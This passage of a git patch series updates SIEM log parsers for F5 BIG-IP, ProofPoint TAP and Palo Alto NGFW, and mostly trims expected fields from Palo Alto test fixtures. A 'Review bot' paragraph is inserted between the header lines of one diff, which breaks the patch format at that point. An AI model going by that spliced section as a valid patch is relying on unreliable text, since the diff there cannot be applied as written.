@@ -339,19 +328,19 @@ stages: - set: event.type: ["start"] - filter: "{{parse_apm_event.message.PAYLOAD_USER_AUTH != None or parse_apm_event.message.PAYLOAD_USER_AUTH_WITH_DOMAIN != None}}" + filter: "{{parse_grok_event.message.APM_PAYLOAD_USER_AUTH != None or parse_grok_event.message.APM_PAYLOAD_USER_AUTH_WITH_DOMAIN != None}}" - set: - rule.name: "{{parse_apm_event.message.rule_name}}" - f5.bigip.apm.rule_item: "{{parse_apm_event.message.rule_item}}" - source.domain: "{{parse_apm_event.message.source_domain}}" - filter: "{{parse_apm_event.message.PAYLOAD_ACCESS != None}}" + rule.name: "{{parse_grok_event.message.rule_name}}" + f5.bigip.apm.rule_item: "{{parse_grok_event.message.rule_item}}" + source.domain: "{{parse_grok_event.message.source_domain}}" + filter: "{{parse_grok_event.message.APM_PAYLOAD_ACCESS != None}}" - set: action.target: "network-traffic" - user.name: "{{parse_apm_event.message.user_name}}" - user.domain: "{{parse_apm_event.message.user_domain}}" + user.name: "{{parse_grok_event.message.user_name}}" + user.domain: "{{parse_grok_event.message.user_domain}}" - source.ip: "{{parse_apm_event.message.src_ip}}" - destination.ip: "{{parse_apm_event.message.dest_ip}}" + source.ip: "{{parse_grok_event.message.src_ip}}" + destination.ip: "{{parse_grok_event.message.dest_ip}}" diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_1.json b/F5 Networks/f5-big-ip/tests/test_apm_access_1.json index 570d31153..2a070a18c 100644 --- a/F5 Networks/f5-big-ip/tests/test_apm_access_1.json +++ b/F5 Networks/f5-big-ip/tests/test_apm_access_1.json @@ -13,7 +13,8 @@ ] }, "action": { - "target": "network-traffic" + "target": "network-traffic", + "type": "notice" }, "f5": { "bigip": { diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_2.json b/F5 Networks/f5-big-ip/tests/test_apm_access_2.json index f7f583da3..a4bccca42 100644 --- a/F5 Networks/f5-big-ip/tests/test_apm_access_2.json +++ b/F5 Networks/f5-big-ip/tests/test_apm_access_2.json 
@@ -13,7 +13,8 @@ ] }, "action": { - "target": "network-traffic" + "target": "network-traffic", + "type": "notice" }, "f5": { "bigip": { diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_3.json b/F5 Networks/f5-big-ip/tests/test_apm_access_3.json index 4b3b16a1f..c2801ee87 100644 --- a/F5 Networks/f5-big-ip/tests/test_apm_access_3.json +++ b/F5 Networks/f5-big-ip/tests/test_apm_access_3.json @@ -13,7 +13,8 @@ ] }, "action": { - "target": "network-traffic" + "target": "network-traffic", + "type": "notice" }, "f5": { "bigip": { diff --git a/F5 Networks/f5-big-ip/tests/test_apm_access_4.json b/F5 Networks/f5-big-ip/tests/test_apm_access_4.json index d2b42ada9..61bb4a141 100644 --- a/F5 Networks/f5-big-ip/tests/test_apm_access_4.json +++ b/F5 Networks/f5-big-ip/tests/test_apm_access_4.json @@ -13,7 +13,8 @@ ] }, "action": { - "target": "network-traffic" + "target": "network-traffic", + "type": "notice" }, "f5": { "bigip": { diff --git a/F5 Networks/f5-big-ip/tests/test_apm_auth_1.json b/F5 Networks/f5-big-ip/tests/test_apm_auth_1.json index c123b3d38..4e15d0ce1 100644 --- a/F5 Networks/f5-big-ip/tests/test_apm_auth_1.json +++ b/F5 Networks/f5-big-ip/tests/test_apm_auth_1.json @@ -24,6 +24,9 @@ "johndoe" ] }, + "rule": { + "name": "/Common/SAML_OCTIME" + }, "user": { "name": "johndoe" } diff --git a/F5 Networks/f5-big-ip/tests/test_apm_auth_2.json b/F5 Networks/f5-big-ip/tests/test_apm_auth_2.json index 70442e2a3..15fc392c6 100644 --- a/F5 Networks/f5-big-ip/tests/test_apm_auth_2.json +++ b/F5 Networks/f5-big-ip/tests/test_apm_auth_2.json @@ -24,6 +24,9 @@ "johndoe" ] }, + "rule": { + "name": "/Common/SAML_OCTIME" + }, "user": { "name": "johndoe" } diff --git a/F5 Networks/f5-big-ip/tests/test_apm_auth_3.json b/F5 Networks/f5-big-ip/tests/test_apm_auth_3.json index a2559de32..ec33a6238 100644 --- a/F5 Networks/f5-big-ip/tests/test_apm_auth_3.json +++ b/F5 Networks/f5-big-ip/tests/test_apm_auth_3.json 
@@ -24,6 +24,9 @@ "johndoe" ] }, + "rule": { + "name": "/Common/SAML_OCTIME" + }, "user": { "domain": "EXAMPLE.ORG", "name": "johndoe" From 12f236fb1e75e8c62e777277e04663f04273f641 Mon Sep 17 00:00:00 2001 From: lvoloshyn-sekoia Date: Wed, 30 Oct 2024 14:06:39 +0200 Subject: [PATCH 184/317] Fix ProofPoint tap --- ProofPoint/proofpoint-tap/ingest/parser.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/ProofPoint/proofpoint-tap/ingest/parser.yml b/ProofPoint/proofpoint-tap/ingest/parser.yml index 51d353695..73a4a3375 100644 --- a/ProofPoint/proofpoint-tap/ingest/parser.yml +++ b/ProofPoint/proofpoint-tap/ingest/parser.yml @@ -9,6 +9,7 @@ pipeline: external: name: grok.match properties: + raise_errors: false input_field: "{{json_event.message.messageID}}" output_field: message pattern: "<%{MESSAGE_ID}>|%{MESSAGE_ID}" From 7e610dee4d6545a0ead2a4094c0bd90eed9d379e Mon Sep 17 00:00:00 2001 
From: lvoloshyn-sekoia Date: Wed, 30 Oct 2024 14:45:27 +0200 Subject: [PATCH 185/317] Rebuild tests for PaloAlto NGFW --- .../paloalto-ngfw/tests/User_id_1_csv.json | 9 +------- .../paloalto-ngfw/tests/User_id_2_csv.json | 9 +------- .../paloalto-ngfw/tests/auth_cef.json | 7 ------ .../paloalto-ngfw/tests/decryption_cef.json | 3 --- .../paloalto-ngfw/tests/file_cef.json | 4 ---- .../paloalto-ngfw/tests/fix_bug_with_int.json | 3 +-- .../tests/fix_bug_without_int.json | 3 +-- .../tests/globalprotect_cef.json | 1 - .../tests/globalprotect_csv.json | 2 -- .../tests/globalprotect_csv_2.json | 2 -- .../paloalto-ngfw/tests/hip_match_cef.json | 3 --- .../paloalto-ngfw/tests/icmp_allow_csv.json | 3 +-- .../paloalto-ngfw/tests/iptag_cef.json | 4 ---- .../tests/network_threat_alert_1.json | 8 +------ .../tests/network_threat_alert_2.json | 9 +------- .../paloalto-ngfw/tests/sctp_cef.json | 4 ---- .../paloalto-ngfw/tests/system_csv.json | 5 ---- .../paloalto-ngfw/tests/tcp_allow_csv.json | 3 +-- .../tests/test_cloud_election_json.json | 4 ---- .../tests/test_dhcp_renew_json.json | 4 ---- .../tests/test_dns_proxy_json.json | 4 ---- .../tests/test_file_alert_json.json | 8 +------ .../tests/test_globalprotect.json | 2 -- .../tests/test_installed_package_json.json | 4 ---- .../tests/test_ldap_brute_force.json | 8 +------ .../tests/test_new_file_type.json | 8 +------ .../tests/test_new_globalprotect.json | 5 ---- .../tests/test_new_threat_type.json | 5 ---- .../tests/test_new_url_type.json | 8 +------ .../tests/test_ntp_sync_json.json | 4 ---- .../tests/test_port_up_json.json | 4 ---- .../tests/test_registration_succeed_json.json | 4 ---- .../paloalto-ngfw/tests/test_system.json | 5 ---- .../tests/test_system_event_10_json.json | 4 ---- .../tests/test_system_event_11_json.json | 4 ---- .../tests/test_system_event_12_json.json | 4 ---- .../tests/test_system_event_1_json.json | 4 ---- .../tests/test_system_event_2_json.json | 4 ---- .../tests/test_system_event_3_json.json | 4 ---- 
.../tests/test_system_event_4_json.json | 4 ---- .../tests/test_system_event_5_json.json | 4 ---- .../tests/test_system_event_6_json.json | 4 ---- .../tests/test_system_event_7_json.json | 4 ---- .../tests/test_system_event_8_json.json | 4 ---- .../tests/test_system_event_9_json.json | 4 ---- .../paloalto-ngfw/tests/test_threat.json | 8 +------ .../paloalto-ngfw/tests/test_threat_02.json | 8 +------ .../tests/test_timestamp_palo.json | 5 ---- .../tests/test_traffic_event_1_json.json | 8 +------ .../tests/test_traffic_event_2_json.json | 8 +------ .../tests/test_update_content_json.json | 4 ---- .../tests/test_upgrade_package_json.json | 4 ---- .../tests/test_user_authentication_json.json | 4 ---- .../paloalto-ngfw/tests/test_userid.json | 9 +------- .../tests/test_web_authentication_json.json | 4 ---- .../tests/test_wildfire_failure_json.json | 4 ---- .../paloalto-ngfw/tests/threat-url-xff.json | 9 +------- .../paloalto-ngfw/tests/threat_cef.json | 18 --------------- .../paloalto-ngfw/tests/threat_csv.json | 8 +------ .../paloalto-ngfw/tests/traffic1_csv.json | 6 ----- .../paloalto-ngfw/tests/traffic2_csv.json | 6 ----- .../paloalto-ngfw/tests/traffic_cef.json | 23 ------------------- .../tests/traffic_with_resotimestamp.json | 3 +-- .../paloalto-ngfw/tests/udp_deny_csv.json | 3 +-- .../paloalto-ngfw/tests/url_cef.json | 19 --------------- .../paloalto-ngfw/tests/userid_cef.json | 4 ---- .../paloalto-ngfw/tests/wildfire1_json.json | 5 ---- 67 files changed, 21 insertions(+), 356 deletions(-) diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json index 08c69d61f..dba765bd4 100644 --- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json +++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_1_csv.json 
@@ -30,14 +30,7 @@
 "serial_number": "016401002222"
 },
 "paloalto": {
- "DGHierarchyLevel1": "12",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "0",
- "Threat_ContentType": "login",
- "VirtualLocation": "vsys",
- "VirtualSystemID": "1"
+ "Threat_ContentType": "login"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json
index 539963216..63c79e671 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/User_id_2_csv.json
@@ -30,14 +30,7 @@
 "serial_number": "01640103000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "12",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "0",
- "Threat_ContentType": "login",
- "VirtualLocation": "vsys",
- "VirtualSystemID": "1"
+ "Threat_ContentType": "login"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json
index ff12d8db6..1b4a52135 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/auth_cef.json
@@ -57,13 +57,6 @@
 "vendor": "Palo Alto Networks",
 "version": "2.0"
 },
- "paloalto": {
- "PanOSSourceDeviceHost": "src_host_list-0",
- "PanOSSourceDeviceModel": "src_model_list-1",
- "PanOSSourceDeviceProfile": "src_profile_list-1",
- "PanOSSourceDeviceVendor": "src_vendor_list-1",
- "VirtualLocation": "vsys1"
- },
 "related": {
 "hosts": [
 "xxxxx"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json
index 1a4fba4b4..e213912c2 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/decryption_cef.json
@@ -61,9 +61,6 @@
 "vendor": "Palo Alto Networks",
 "version": "2.0"
 },
- "paloalto": {
- "VirtualLocation": "vsys1"
- },
 "related": {
 "ip": [
 "1.1.1.1"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json
index 2da36f33e..965583ed3 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/file_cef.json
@@ -65,10 +65,6 @@
 },
 "paloalto": {
 "DirectionOfAttack": "client to server",
- "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
- "PanOSSourceLocation": "1.1.1.1-1.1.1.1",
- "URLCategory": "any",
- "VirtualLocation": "smtp",
 "endpoint": {
 "serial_number": "xxxxxxxxxxxxxx"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json
index 512ae89e7..4dadbb51b 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_with_int.json
@@ -52,8 +52,7 @@
 "serial_number": "001701003551"
 },
 "paloalto": {
- "Threat_ContentType": "end",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "end"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json
index add589697..4863396f8 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/fix_bug_without_int.json
@@ -52,8 +52,7 @@
 "serial_number": "001701003551"
 },
 "paloalto": {
- "Threat_ContentType": "end",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "end"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json
index 4fd7b8802..09505692f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_cef.json
@@ -42,7 +42,6 @@
 "version": "2.0"
 },
 "paloalto": {
- "PanOSQuarantineReason": "Malicious Traffic",
 "authentication": {
 "method": "RADIUS"
 },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
index 65f2b6940..0c72fdb63 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv.json
@@ -34,9 +34,7 @@
 "serial_number": "ABCDEFG"
 },
 "paloalto": {
- "EventID": "gw-auth",
 "Threat_ContentType": "0",
- "VirtualLocation": "vsys1",
 "connection": {
 "stage": "login"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
index e4b1d5fab..2f8cb93ae 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/globalprotect_csv_2.json
@@ -34,9 +34,7 @@
 "serial_number": "DFN3535D"
 },
 "paloalto": {
- "EventID": "gateway-config-release",
 "Threat_ContentType": "0",
- "VirtualLocation": "vsys1",
 "connection": {
 "stage": "configuration"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
index 6a0a99b82..966ea0b88 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/hip_match_cef.json
@@ -40,9 +40,6 @@
 "version": "2.0"
 },
 "paloalto": {
- "PanOSEndpointSerialNumber": "xxxxxxxxxxxxxx",
- "VirtualLocation": "vsys1",
- "VirtualSystemID": "1",
 "endpoint": {
 "serial_number": "xxxxxxxxxxxxxx"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
index e4e153224..6e8e88e79 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/icmp_allow_csv.json
@@ -49,8 +49,7 @@
 "serial_number": "1801017000"
 },
 "paloalto": {
- "Threat_ContentType": "start",
- "VirtualLocation": "vsys"
+ "Threat_ContentType": "start"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
index 9d2db872a..4eef50d9d 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/iptag_cef.json
@@ -39,10 +39,6 @@
 "vendor": "Palo Alto Networks",
 "version": "2.0"
 },
- "paloalto": {
- "VirtualLocation": "vsys1",
- "VirtualSystemID": "1"
- },
 "related": {
 "hosts": [
 "PA-VM"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
index d14918dab..a6c93b2c4 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_1.json
@@ -58,14 +58,8 @@
 "serial_number": "000011111112222"
 },
 "paloalto": {
- "DGHierarchyLevel1": "982",
- "DGHierarchyLevel2": "117",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "client to server",
- "Threat_ContentType": "url",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "url"
 },
 "related": {
 "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
index e8c257c69..6fd2dbfa0 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/network_threat_alert_2.json
@@ -63,15 +63,8 @@
 "serial_number": "no-serial"
 },
 "paloalto": {
- "ContentType": "text/plain",
- "DGHierarchyLevel1": "463",
- "DGHierarchyLevel2": "525",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "client to server",
- "Threat_ContentType": "url",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "url"
 },
 "related": {
 "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
index 717e963a0..ff9edc877 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/sctp_cef.json
@@ -57,10 +57,6 @@
 "vendor": "Palo Alto Networks",
 "version": "2.0"
 },
- "paloalto": {
- "PanOSSourceLocation": "US",
- "VirtualLocation": "vsys1"
- },
 "related": {
 "hosts": [
 "PA-5220"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
index 3e52f494c..ab8aae097 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/system_csv.json
@@ -30,11 +30,6 @@
 "serial_number": "11111114444"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
- "EventID": "auth-success",
 "Threat_ContentType": "auth"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
index eb10d6148..49c1758ab 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/tcp_allow_csv.json
@@ -49,8 +49,7 @@
 "serial_number": "1801016000"
 },
 "paloalto": {
- "Threat_ContentType": "start",
- "VirtualLocation": "vsys1234"
+ "Threat_ContentType": "start"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
index 3af5d5428..c4c2b4c70 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_cloud_election_json.json
@@ -37,10 +37,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "url-filtering"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
index 5e1cc96a9..17ae8dd31 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dhcp_renew_json.json
@@ -37,10 +37,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "dhcp"
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
index f4541dcbf..72af37535 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_dns_proxy_json.json
@@ -29,10 +29,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "dnsproxy"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
index 3142ed671..ee2f64323 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_file_alert_json.json
@@ -60,14 +60,8 @@
 "serial_number": "no-serial"
 },
 "paloalto": {
- "DGHierarchyLevel1": "463",
- "DGHierarchyLevel2": "467",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "server to client",
- "Threat_ContentType": "file",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "file"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
index f08a677ef..aa4388311 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_globalprotect.json
@@ -37,9 +37,7 @@
 "serial_number": "PF000000"
 },
 "paloalto": {
- "EventID": "gateway-switch-to-ssl",
 "Threat_ContentType": "0",
- "VirtualLocation": "vsys1",
 "connection": {
 "stage": "tunnel"
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
index bbf2d4e97..ed54db08a 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_installed_package_json.json
@@ -33,10 +33,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "general"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
index f569f8246..6ba2ed95f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ldap_brute_force.json
@@ -51,16 +51,10 @@
 "serial_number": "012001002253"
 },
 "paloalto": {
- "DGHierarchyLevel1": "24",
- "DGHierarchyLevel2": "315",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "vulnerability",
- "VirtualLocation": "vsys1",
 "threat": {
 "id": "40005",
- "name": "LDAP: User Login Brute Force Attempt",
- "type": "vulnerability exploit detection"
+ "name": "LDAP: User Login Brute Force Attempt"
 }
 },
 "related": {
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
index 610ab7c24..f5f961342 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_file_type.json
@@ -73,14 +73,8 @@
 "serial_number": "007954000XXXXXX"
 },
 "paloalto": {
- "DGHierarchyLevel1": "999",
- "DGHierarchyLevel2": "1111",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "server to client",
- "Threat_ContentType": "file",
- "URLCategory": "business-and-economy",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "file"
 },
 "related": {
 "ip": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
index 25db7ff0a..501fb4be5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_globalprotect.json
@@ -38,12 +38,7 @@
 "version": "0.0.-1"
 },
 "paloalto": {
- "DGHierarchyLevel1": "556",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "globalprotect",
- "VirtualSystemID": "1",
 "connection": {
 "stage": "logout"
 },
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
index c3d742b70..80edd7cf5 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
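Review bot: The rebuilt expectation drops `paloalto.threat.type` (here `"vulnerability exploit detection"`) along with the DG-hierarchy and vsys fields, but no parser change ships in this patch, so nothing in the fixture now asserts where, if anywhere, the threat type is still exposed; the same removal appears in test_threat.json, test_threat_02.json, threat_csv.json and threat-url-xff.json. If the value was relocated to another key, the fixtures should assert it at the new location; if it was simply dropped, consumers that distinguish URL-filtering logs from exploit detections by that field lose the discriminator, which is worth stating explicitly. Since the fixtures are JSON and cannot carry a comment, record the reasoning in the PR description by naming the parser change that removed the field, so the shrinking expectations stay traceable.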
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_threat_type.json
@@ -62,13 +62,8 @@
 "serial_number": "007954000370000"
 },
 "paloalto": {
- "DGHierarchyLevel1": "997",
- "DGHierarchyLevel2": "1169",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "client to server",
 "Threat_ContentType": "vulnerability",
- "VirtualLocation": "vsys1",
 "threat": {
 "category": "brute-force",
 "id": "SSH User Authentication Brute Force Attempt(40015)"
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
index b4a75c57c..6a5a4358f 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_new_url_type.json
@@ -64,14 +64,8 @@
 "serial_number": "00795400037XXXX"
 },
 "paloalto": {
- "DGHierarchyLevel1": "997",
- "DGHierarchyLevel2": "1169",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "DirectionOfAttack": "client to server",
- "Threat_ContentType": "url",
- "URLCategory": "computer-and-internet-info",
- "VirtualLocation": "vsys1"
+ "Threat_ContentType": "url"
 },
 "related": {
 "hosts": [
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
index a470b3176..1ad423127 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_ntp_sync_json.json
@@ -32,10 +32,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "ntpd"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
index af31efa35..ed9754708 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
+++ b/Palo Alto Networks/paloalto-ngfw/tests/test_port_up_json.json
@@ -36,10 +36,6 @@
 "product": "PAN-OS"
 },
 "paloalto": {
- "DGHierarchyLevel1": "0",
- "DGHierarchyLevel2": "0",
- "DGHierarchyLevel3": "0",
- "DGHierarchyLevel4": "0",
 "Threat_ContentType": "port"
 }
 }
diff --git a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json b/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
index c9ebd467e..76aeaa4ce 100644
--- a/Palo Alto Networks/paloalto-ngfw/tests/test_registration_succeed_json.json
